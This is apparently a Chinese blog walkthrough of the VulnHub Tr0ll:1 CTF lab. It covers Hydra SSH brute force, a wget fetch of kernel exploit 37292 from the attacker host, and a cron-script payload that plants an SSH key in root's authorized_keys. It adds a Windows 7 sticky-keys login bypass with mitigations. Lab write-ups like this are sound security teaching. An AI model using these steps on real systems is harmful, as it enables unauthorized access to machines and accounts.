No.4-VulnHub-Tr0ll:1-Walkthrough渗透学习

**

VulnHub-Tr0ll:1-Walkthrough

**

靶机地址：https://www.vulnhub.com/entry/tr0ll-1,100/
靶机难度：简单（CTF）
靶机发布日期：2014年8月14日
靶机描述：Tr0ll的灵感来自OSCP实验室中不断摇曳的机器
目标：得到root权限&找到proof.txt
作者：大余
时间：2019-12-30

请注意：对于所有这些计算机，我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

我们在VM中需要确定攻击目标的IP地址，需要使用nmap获取目标IP地址：

我们已经找到了此次CTF目标计算机IP地址：192.168.145.149
我们开始探索机器。第一步是找出目标计算机上可用的开放端口和一些服务

命令：nmap -sS -sV -T5 -A -p- 192.168.145.149
我们可以在上面看到Nmap找到开放的端口22、80，其中暴露的robots.txt和/ secret目录，还有FTP带有匿名登录名：Anonymous FTP login allowed
遵循Nmap的线索，开始进行攻击

登陆ftp，查看有啥有用信息，这里会用到FTP基础知识

查看当前目录，我们发现有一个名为lol.pcap的文件分析包，将文件下载到本地使用Wireshark打开查看（Wireshark需要必须掌握的知识，不会的赶紧脑补）


wireshark打开lol.pcap 发现提示：
FTP Data …secret_stuff.txt
FTP Data Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol Sucks, you were so close… gotta TRY HARDER!（硬生生给你们手打出来的…）
鉴于只发现了SSH/FTP/HTTP，英文说让我使用root/sup3rs3cr3tdirlol登陆ssh 失败告终！

我以为我输入错了，经过错了几次，发现是个坑…哎
跳过这个…继续寻找信息
从web渗透试试

没啥有用的信息，继续浏览robots.txt

继续浏览/secret

还是没什么好的信息，由于前面wireshark打开lol.pcap发现的信息sup3rs3cr3tdirlol，我尝试着打开目录

这里我就试着打开，还真有信息…
下载roflmao文件并检查其类型

它是32位ELF可执行文件，使用strings字符串对其执行一些静态分析（前面章节有介绍）

进来看到笑脸…Find address 0x0856BF to proceed意思是找到地址0x0856BF
进入看看

发现有两个文件夹：
good_luck（进入查看包含文件which_one_lol.txt）this_folder_contains_password（进入查看包含文件pass.txt）

这应该是用户名，因为下面有个pass密码…

只有一个密码，将文件都下载下来…使用九头蛇查看

命令：hydra -L which_one_lol.txt -p Pass.txt 192.168.145.149 ssh
login: overflow
password: Pass.txt
ssh登陆查看信息

靶机正在运行Ubuntu 14.04和3.13内核，看看是否可以找到这些版本的任何特权升级漏洞

二、提权

访问exploit官网查看到可利用提权shell


在exploit官网查看可以使用37292进行提权（之前文章也遇到过使用37292提权）

cp /usr/share/exploitdb/exploits/linux/local/37292.c /root 由于之前文章使用过我本地已经有shell了，然后使用python创建一个服务，通过服务上传37292.c到靶机中

命令：python -m SimpleHTTPServer 5555

使用python获得的shell权限后，得使用ptyhon获得tty，使用
命令：python -c ‘import pty; pty.spawn("/bin/bash")’

命令：wget http://192.168.145.143:5555/37292.c

gcc 37292.c -o dayu
./dayu

获得root权限，并查看proof.txt内容

三、提权方法

这台靶机你们会遇到登陆ssh [email protected]后会2分钟就自动断开会话超时，然后得重新连接，这边继续讲另外一种提权方法（我这边回家操作了IP地址变动了）
会话自动断开，原因可能是设置了计划任务
查看日志/var/log/cronlog

继续查看信息/lib/log/cleaner.py


cleaner.py脚本是以root权限执行的，并且该脚本是全局可写的，那么我们就可以利用这一点进行提权

使用ssh-keygen（用来生成ssh公钥认证所需的公钥和私钥文件）
目录默认、密码Pass.txt、反复输入密码即可在/root/.ssh/目录生成id_rsa、 id_rsa.pub文件


将 id_rsa.pub产生的密匙内容复制到文本中

使用vim修改cleaner.py文件
命令：
#!/usr/bin/env python
import os
import sys
try:
os.system(‘mkdir /root/.ssh; chmod 775 .ssh; echo “加上 id_rsa.pub产生的密匙内容上图有例子” >> /root/.ssh/authorized_keys’)
except:
sys.exit()
这脚本提供给大家，收藏慢慢累积学习

出来后直接执行ssh [email protected]，然后输入Pass.txt即可登录
这边的例子请用在正途！！后面还可以用反弹shell，或者自己写木马shell去提权，目前我还比较菜…在努力脑补！！
不缺乏更多的方式方法，方法知晓记得越来越多，网络安全就会在你面前形同一张纸，你想进入就动动手指即可！！

此文章还未完…
由于我好朋友都和我说看不懂我的文章，我后期会陆陆续续分享一些生活中能简单利用的windows漏洞！
此方法针对的是未打最新补丁的用户（目前我身边的人windows都有这个漏洞…看到的尽快打上补丁）
今天讲解的是利用5次shift漏洞破解win7密码（后续会介绍win10）

连续按5次shift如果出现了和上图一样的界面，就存在此可利用漏洞！！！

如果存在，右下角重新启动电脑

然后在上图“正在启动Windows”界面强制关机，拔掉电源即可…!!!
在开机！！

开机后会出现**进入启动启动修复（推荐）**选项界面，选择修复

修复会进入这个界面，千万别点还原…点取消

点查看问题详情

点击erofflps.txt目录



到C盘system32目录下往下翻能看到蓝色的图标名称：sethc

重命名文件改123（名称随意改）

继续往下找到黑色图标：CMD文件

复制一个cmd！！！

将复制的cmd副本改名

改成sethc
然后关掉记事本文件

完成重启即可

到用户密码输入界面连续按5次shift即可出现上图，到了这儿下一步我就不教了，希望大家慎重！！
下面我教大家修复的办法:


这方法只能缓解，有时候重启电脑就不生效了，如果系统盘为NTFS文件系统，可以将sytem32下的sethc.exe文件设为everyone拒绝访问,或者直接将其删除，最好的方法是在控制面板-辅助功能选项-粘滞键选项，将“使用快捷键”取消即可。
最有效的方法就是更新系统补丁至最新！！！！！

由于我们已经成功得到root权限&找到proof.txt，因此完成了CTF靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。